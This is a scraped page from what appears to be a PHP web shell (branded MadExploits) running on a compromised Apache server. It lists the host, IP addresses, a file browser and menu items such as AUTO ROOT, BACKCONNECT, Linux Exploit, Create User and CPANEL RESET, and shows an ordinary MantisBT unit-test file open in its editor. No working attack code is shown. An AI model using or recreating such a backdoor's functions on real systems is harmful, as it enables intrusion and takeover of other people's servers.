Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
mantis /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
Mantis
[ DIR ]
drwxr-xr-x
soap
[ DIR ]
drwxr-xr-x
AllTests.php
1.21
KB
-rw-r--r--
TestConfig.php
1.81
KB
-rw-r--r--
bootstrap.php.sample
161
B
-rw-r--r--
test.php
1.14
KB
-rw-r--r--
test_config_get_set.php
1.91
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test_config_get_set.php
<?php # MantisBT - a php based bugtracking system # MantisBT is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. # # MantisBT is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with MantisBT. If not, see <http://www.gnu.org/licenses/>. /** * @package MantisBT * @copyright Copyright (C) 2002 - 2013 MantisBT Team - mantisbt-dev@lists.sourceforge.net * @link http://www.mantisbt.org */ /** * MantisBT Unit Test */ /** * test config_get and config_set * * run from command line using: php -q test_config_get_set.php * inspect results manually * Notes: * data set from the test may need to be removed from the database manually */ require_once( 'test.php' ); $t_config = 'main_menu_custom_options'; $t_test = config_get( $t_config ); print_r( $t_config); print_r( $t_test ); $t_test[0][1] = 20; config_set( $t_config, $t_test ); $t_test = config_get( $t_config ); print_r( $t_test ); $t_config = 'default_home_page'; $t_test = config_get( $t_config ); print_r( $t_config); print_r( $t_test ); $t_test .= '?test'; config_set( $t_config, $t_test ); $t_test = config_get( $t_config ); print_r( $t_test ); $g_test_config = array(); $t_config = 'test_config'; $t_test = config_get( $t_config ); print_r( $t_config); print_r( $t_test ); echo " ".(isset($t_test[0])?"set":"not set")." ".count($t_test)." "; $t_test[0] = 20; config_set( $t_config, $t_test ); $t_test = config_get( $t_config ); print_r( $t_test ); echo " ".(isset($t_test[0])?"set":"not set")." ".count($t_test)." ";
Close